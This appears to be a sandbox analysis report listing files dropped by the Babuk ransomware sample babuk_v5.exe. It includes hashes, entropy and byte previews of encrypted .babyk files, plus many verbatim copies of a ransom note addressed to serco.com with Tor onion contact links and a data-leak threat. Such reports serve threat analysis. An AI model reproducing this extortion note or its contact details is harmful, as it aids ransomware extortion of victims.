                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\UrlBlock\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\BrowserImport\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DNTException\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DNTException\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.569218167198455
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlS9MKNgPZUiPuENu7cfrnR7AONUYENw61p/nJbIJfqL6AFVpjT0NLUxNvEEn:1PZUiPVGOGpK61tnCJxAFVpjT0NL0vtn
                                                                            MD5:A0FB8BF8F618749C3AFB24BF2B8B8AA4
                                                                            SHA1:3FF118F759B8C33A6CD7760113AD5FE5AE8E149A
                                                                            SHA-256:AC921FCC8DBE68BC6BD8D832AE167E36C844BFCEEADF03B18767EAEF601D3543
                                                                            SHA-512:E3296DECF042A6D5A3D007E2753D9E63539026F8AA8DCD3A2C13A2E0A5FF55E8C20E4405651206EF28A90858359D167B7031961CE9ECCBFE281DEA4AE25F3BB6
                                                                            Malicious:false
                                                                            Preview: ......%.....5..+....M..Z..@..........R....zo.&mc...9.....Cq......r.@2.nI!...eL.;..2...~..g:.,..>-,..A.uZ=.....K..SS..J..a.\L%cd....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999610952779036
                                                                            Encrypted:true
                                                                            SSDEEP:12288:sta0cXyX+GRHhDa9GTHqaA862idSLQiAG5jvu:st4CX+GFhDBA86t6QK5ru
                                                                            MD5:756F93089280D76DB0B137804C34A9BD
                                                                            SHA1:38ACE74C743245B8FB826826A4B799893708D215
                                                                            SHA-256:7E7E5719482A6147DB8F38AEBBE24C66A5204B8F1ADF4B75D66D80AAE71267FD
                                                                            SHA-512:801493C26FE8D30A460B1B3EADC83D36F0D98362370EA1EA0241A755BC2D003059B692A4B95CBA1356E5C704FA104B06CD01A24D2FC622A74F51EA3A64D03434
                                                                            Malicious:true
                                                                            Preview: ...Y.0.........\4.z.... .-^.mH.dd......`].j...|...P.!H. ...Ap..}t..p...z......O....=2..W..cI^..3........'......~.'j.;....".t.Jh.+......5'h7R.....i.t..oF.L.R.I./^..U70..d:u3...9....b.4j......6'9....T.....;S......}.u...F6..t..4..*b#......@;.n]2..u...v...?.m...+g..^U...&....T.V..|4K.jrg*).C.g.;....%..y...m..K....2....P.....^R.F...#..Uc. o.i..t@C~.B....Zz...X.DE@.TIem$..I.C..5.LO....H\..z...w.M.v.z....:x.Z.Ew.....<)..us<..'.?H.U.Y?...]..jtj+.................Q......<6...3.;..3!....K.5.D+..T*n.v.3...o!.2.!...g.H....[9.b2.~J.Y..%..E....t2......:.p.8/......QSe6.y?W.....+........Y...o.s[n.e.(....9....v..6.>.Y.uZ......h>].`j....N...D.[$W..l..*.....Leo...LWv.\..U.25....5......9`..p.P...8.Z.I7.q."|...._.^..z.zJ..mB.q.y...`u.Q....#_.A..!.kC.e..I......k.@.h...XW.........q..u..;.=.r...........i.2..a....1.e.z;4.~..../.....9.../...f..H..+...C.......p...}WAp.gq...zI@.'.n`..h.(.......MN.......#.."..^9Z...Z7}.._.<p.b..R./3...b.....L...'...?....E.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbres00001.jrs.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999629034674376
                                                                            Encrypted:true
                                                                            SSDEEP:12288:XRJO62ECM2li8ZLB0b614tGRjh/A5oBUrgwdsCPJDK:XWEChXLB0b6utmjZAoB7ihDK
                                                                            MD5:1C80F0EEEB96C87779C729B504B2C5CA
                                                                            SHA1:11E700C4A9B2767DCE770A0ECBA82134E9176EFD
                                                                            SHA-256:39EC323D04DB2EC929528FF571871D9427FF8109E9E35FBCAC1EBE4B2CF32949
                                                                            SHA-512:71CCAA506F5722F965AE52567F77EEFD49DCB8693E0E3D739C23408CE2D4030666AF3E67872069D7B90F81AF40D21568D134C987D2264AB6737E4835FA1006FC
                                                                            Malicious:true
                                                                            Preview: ...`.Y.9...N........!.p......`.c.\&.N=.]..>.D........Tw.. .k..lS...n.....h3}...nPq...L*.'.c.M.H.v.6..._.k.._..".f.o..1.O5QfF...7S...(.i.R.<..l.mae.."%a...-.j.}5..7..9..b.p...P6. j...;hXn.....$;...H.N>}......l....R..w.G....e.9.W35^..T...o...j..-.G.......9.>.>..g........tJ).....aA>5..z.0.3.?...5.;._Ga.q......{..=.....5<..x.....T..8...>t.G...g......0.G..u..XJ ..]......4.".[..+.na.+.PQ_V..,&........d.$.Dz..zY_R....@C..eG...?.T...6.a>..C...l..e.I.NV..o......._.>.W.5|..c=L..7po......<.....$.8.-WR...u....{.H..1.;.......X^m.........Fu!.T..s..`..F-.X.q....G.].._.zM........3..%..nE..3..N..v....U.[F.].....I...^h..J....]..XE...jT`.k..'..]....8..~4..'...J#5s.q......vG&.(..1.Zi.M.......,Y.W~....t......./J.......q.0....z..$..N......&...;.H....Q..J...G|.....X....h./.B.=O.........Y..m...s.y_s......5..^.)...l....E.a..@...\e`.. ..\*#j.q...z...`#S...M~`.R.9~.N...o....H...4<.;.....{.i.2.3.(2.l.....P....7w@[.1...)=g[(}...C.'Mmp..v.:m....g1.......%..<...9....
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbres00002.jrs.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999629601140373
                                                                            Encrypted:true
                                                                            SSDEEP:12288:fdYKwYCOgTCyi+QYrZ1ZiaknBt3o6rV8Fb6E3jUu3c0I:fOYCmyi2mNVZYjUT
                                                                            MD5:EB0FF381ABB8972B4D6201BEC553B386
                                                                            SHA1:BF9F71FA94EC98DE49DB1AAA6279672DA4C9C5C0
                                                                            SHA-256:CAA2A8145A7BED9D6C8B03B188B97980CEA1BF388D47FF30EBC2ED5387051F46
                                                                            SHA-512:314D888783893A1E87E030934431A5536E8489F8F5D350975F5210038C4B5BEB755F3477085B50AF853C773A3B51893E2FB77BCA489A5B0A4DA71C2A18FB0F20
                                                                            Malicious:true
                                                                            Preview: .U+^...G.9...........Cs..(;.V.YGT....yT&,.,.6.>....V..CJ....t.!N......:yy.H.3.{......"U.grg.=..:.#.d`.XkY...d........z....I..E....x...b...c!07..p....8..u.M..^.[|.?....4......3../...}V......5=^2..W.A[}.......W...mOA`_.|+|...x..R_....R..'q..E..^..8..g].d(.*?.q..6..Ok$:S..s.)..~{.........c.<.K..B..n.......*#5...b..i.U..1.PW,..|@1=.t.S....P..v.q..Amx_.K...Wt....{...8.N.D..A............X.ks...4Z...$..j..iR..v..d1..b.F>|B..:B..f..2.-........."X...G3N.5Z.....\....i......0;....)Ys}.vQ..6; ...d...7. .."Z.......n.7..<...7..o{.L.w.....~.....v..^..)KG..uZ..KE.BoEb..:..H.].S.B.9.%.A.5"...:.g..a*.c.._.}...\>...1..5=...&q...aaP.Q.L.."..a.j..9.>..XtD.Q.B.;u..).......I..]:z.!....%.o....C.A.\.J..{..l2...n..%..~:..I..e:".=w]...'....*...T.....C.~.@.........6Z+.g[.Kf.H"lf......s.{8.....[..O.g{G...s.......].....$].~W,..i.D......S.......#.........yt.....q./fhm.&....k..:F.&M...6.[/.k. ....N.......<6......L.a.*B+l_.4..n.o...@.. .F..n....<..x.p.0t.....
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbtmp.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999673638468469
                                                                            Encrypted:true
                                                                            SSDEEP:12288:+6KA8veKgkkrCbEGrdxIDw0J4DD/ioOC5bwO/hBK7scshg2hsFx0cKeOFzi:p1DAEStiDi+QNhsxKFi
                                                                            MD5:A873527635FD7278604247004978931B
                                                                            SHA1:D3B1E93D45BBFFA5251370805CDEECE482A254F0
                                                                            SHA-256:9E62535F0BFAC5BCDC9822E361690E6AE72354BDBA15A0020C738839E835B569
                                                                            SHA-512:79E20B182417337AA0169DE780980ECF25A8D405AAED88DA7AF6A3E0BE670338BAC3EF9B1F33C20206728812D6FA7825BFF0C7A7345034802BD02A6D3079DA28
                                                                            Malicious:true
                                                                            Preview: j.*.LH>/.6+.C..x.b...8T..k.'..&^.N.F..iW[.sKh.......cC.4......_..j\...>...m.-....3^.467.F........r..G.c.x@.g.E..*..=w|..aB.cB......4'.C....]....Rpm...A..1....G..a....Wq\..L,'.4..'TB.Q...[o......*.{.\....D:.q.`.W...J.<.&>..N...%..y. ^V.:.Q...<1.O.X4.+..s.h3:9.!z.JH..gb4.L.(FU....y.ehO./2..2^.i.6..1[.{...J....qf.\.....+..o.FG?.Xw:.C%PY....o$......[4.>2iQ.8.f.p!...0+..9.1...Q.[..w-..X....C\..FU..N."}.c..U.u.}...D...A....bv........H...cn.P....C..L.4|.Fe....j]..[.H..^..3..{.,....i9>......2.]........N......Z.[_..O...>.<w.*....Z....+....d......O......c.,..9....S..@.L2..+.4t..8..F..q......).__@.z....,.Z.&...+...x.K$.vC!..+qK......XI..@h.-.. ....!.2rFjk..j.'...........a.u...K...:.....F...(.?V.4.......O.Z....~d..3...2..n.:......J.hF.P.nv7.k."e7}.$.9...fs..U\h*..3....?...i...V('>.9q`c....U;Ni..Bw(...H........9....D<_x.......=....U..'v.y.D..o.&|.'..`O.&:c.....0..G...,..m_+#c*....I...v1/..X.NI.....3*.......I{;.WG.).=...R...J."..n<l.Z...-H.Z.....B.f.4..2l.A
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\edb.chk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.976063680337458
                                                                            Encrypted:false
                                                                            SSDEEP:96:Mkdd4KQMZQvlvbk2PsM58K82Wu+RhoVc/oB/lKbn1Dg6mHUrevFSi0YuDOwoDtFq:TSvlvbpNKKdVTInq6mHU6vgrxOwoDtg
                                                                            MD5:9907D1581D82EAABA078D0534DDDADB7
                                                                            SHA1:143DA449F2C934D22538B2026C2AC86208A3E70D
                                                                            SHA-256:E811962FBC39A0DB9B0024EB8564F2153E084D32B11232FF69CC377ECC6CADA4
                                                                            SHA-512:B9BCF06D348BA1E75AA0CE2F0887EC5D9143DA46031CA8AABC10202FD4A67F60C3476F260E8FA1D001DE5BEBDF1F5F09E187BA77740B049EEB06CCB1B2EBE2CB
                                                                            Malicious:false
                                                                            Preview: t|.D..qo6.....m'.<..L..Q.....k.$I2.j..;.K.,ik..,.{.gW.$+........./k~..[..F.....6.*.....?.P.....`.x....}q...#.Rq.:..x%h......-...?..@.4\...n.X.(....2H.."<81_.J.>.....C.1..Z..5......yai....$ ..$....J..f^pf.`.............(V.:.........@.n..^!...#.xm.doZ.:.N...XD...).....x....l.0....J./40.g&.Y.Z....w....H...w".].P..+1.@....N.u..%IeOAu.JP.G.....#Q4V.[.....p.U..c.cRcu...:............,<.]...j.l`K$.t.K........_..ZD.j.[..z.....S..Tg.A.}..Jy......'7R....p.....I.A.t..](]>w.RU+8z..!.-".......3.M...h. ..5..X../.....3fQ...........?&..y..b.p4.._...p..$....t..#....$....fz-.(.I.H.^..;...*T.I......yG...y..Q.....JW.y"3..h=....J"...U=.L.G....xW.. |V..q.1\))0.*.9.>..}.SE.,.*&-k}....jW.0..;.%k.g..;....J...j.%g..F.2}...s..(+F../$cD..T...D.;...v.+...z.....`\T..$. V.....{..].+z.4.y...l..-..hj..?......`.j...tE.N$.~1Ei..S.&?S.e.l.B.{....Q...~.NZ.....=.-Qb......L.*.V....D.~D).......4n.XY.K>.J.h.o....%..e..V.MW...).[.Q ...$W~2}}..j...*..............s.T.G7.QY!.'Z.+..{6...E......Z.6
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1048744
                                                                            Entropy (8bit):7.999810926304408
                                                                            Encrypted:true
                                                                            SSDEEP:24576:tmnvWthS6xb3HCd612Isy3ZMYbku500bYpD5XQMfqP:t2vWrZpdln3wn1XQMfqP
                                                                            MD5:EB9AEA238EBB7C81D99FDADC64F36B39
                                                                            SHA1:C707E9E298D254E0B291DCE717DA75979D4C78FF
                                                                            SHA-256:861E84EF15F16C855CF8AB79D97D570FB61301DF7DC1A8DBAB968EDCA380FB76
                                                                            SHA-512:5965C7A8D500372BF0A373A43C1A654B6A114D07D6415977C5F1E72C09FD03CE03ED2C5937A288F3825DCE16C26FE7C01BF4A0B00333BE79B8759B19D857E916
                                                                            Malicious:true
                                                                            Preview: ..A.d...k..,..a..P.K..a...}.[..&..r...M.ow......U.:9.9...f..Z!24t+V..u.Y...%.\2..$..R.+..$^....,m..^1.S..r.+.F\...N...X4......q....9.#.7...1....'......_.....[.\,..jS..H.....Ec.3........P...".~!v...,.rrI...lZ....?..OB).-..s~6..:....xx......B..@.s...R..a.Z..3.....7...../...+/H..UvS..]..W..2.e.ZIlh........S...t....\qf.....<.*.z.~..._....5.2.......f."Y....5l.`......Az..k.Rl}..R.z.]e...Vk.k..E.c......}W...a.......Hos.cUMd5e.>.{b..gm#..."Z@.B.|x....d!-p..>.=:S%Y6.....(Q+..#.......D.#..b.44T.^e,.Y..SALL2.}...U3r..% @.....J.6..{.i.i.1..vo..TKkm ..z.3..n..w...%.@.#m..'.L_.Z..S..8.f...[..m......e.../.g...h.1.zB.>....T....MX._l.{L...f.i..L.D..R.[.?-.9.....8F..v%I5F}......+..Q=87]U...GF....l.]..0.b..!....qh'.dm.[..K...Hi...C..@Z....v..J.z................1....5[....\f..N..A..J...(...?._.U..'..YS.....<U....\.Z.._......-YHi..+]m.k......S..r.g..=F<..>..QQ<Q..9n....w....._.y...)g.vov..U..8+.+.C..w.e.M...j.<. ..&.A.-MM....Z..d:.d:.k ...1....t....
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):16552
                                                                            Entropy (8bit):7.987633907187054
                                                                            Encrypted:false
                                                                            SSDEEP:384:qjWw0T+HA+stApK1YaXEQdcdFTIJ9seWgO1rodL2RieBilIzZV:nfT+HzsuDaXLdExqsygcdQRBil6ZV
                                                                            MD5:F66C5C201410F367D008E6A4921F769B
                                                                            SHA1:9FF0183137331C122A3F061CF34D0CBC393F8626
                                                                            SHA-256:C5AC33867DC7F740B4010D10EB757459E29F205AB0188FE23A8DC5325346107B
                                                                            SHA-512:49AF1B5EBB250957998BAC25214AD1501A2EDE9BB5870FD302D5CFAB2C1EA969C90F463C551B7FFE01298E969D7F7B1D943025AF8C05D5C7AEB8B086DA6AA0C7
                                                                            Malicious:false
                                                                            Preview: A}.5v6...&.u.....B...K.S.^%....rXw..W$)..u/nCs...2..t......i`{w@......U...F..P1+.4..."^.C...c.i+..=./...h~...D...,.-D..@;...fU.mM.`h.qk./#5.D"...)'.l.....8....'.(.\..!.5!.....d|=.l.6....F.........*(....+,q.....N..H......A.L...8l.X.b.<Z.j>...m....60r...C[.C.5N.YLM...K?.(.....%..|......0..K-...U+f'g....q...(..t.@|...!An..Y.A......l|dU..................*.C.'>......c.......z..A,.?..-.A..!.F...y...J.P..........c^...O...OO.....d.....er........q'[.}.a3...IG..4t...P....[.$...W6....[!....9{.W..h3..8A]~hnl.%'.>....f......~..m..}$%......2.t..}5.N...L..aq..4.......,jS..._B>f......R...'7T....;...|.&......6..V..L/.)./.ZEeHY..Ci........4.l:...y...N..5..~.-.J.....E....,wD..v.)yp-P..,.(.?....p..g.....").j.D.&....%oh.......[v.D.y.4..&.9:.......h.l..........<.l..1k...4..6..!O....I.lY.....4......'..?.5...........R.p..J....dR2......!... .8.D..a..&c....3..;\;...._.{....z..g;.-..m....G<.....}..B.z..qMt.@.5.O_&[..\.,>..;.|....e..<...LS..%C.2T...H....p.'U.M.D
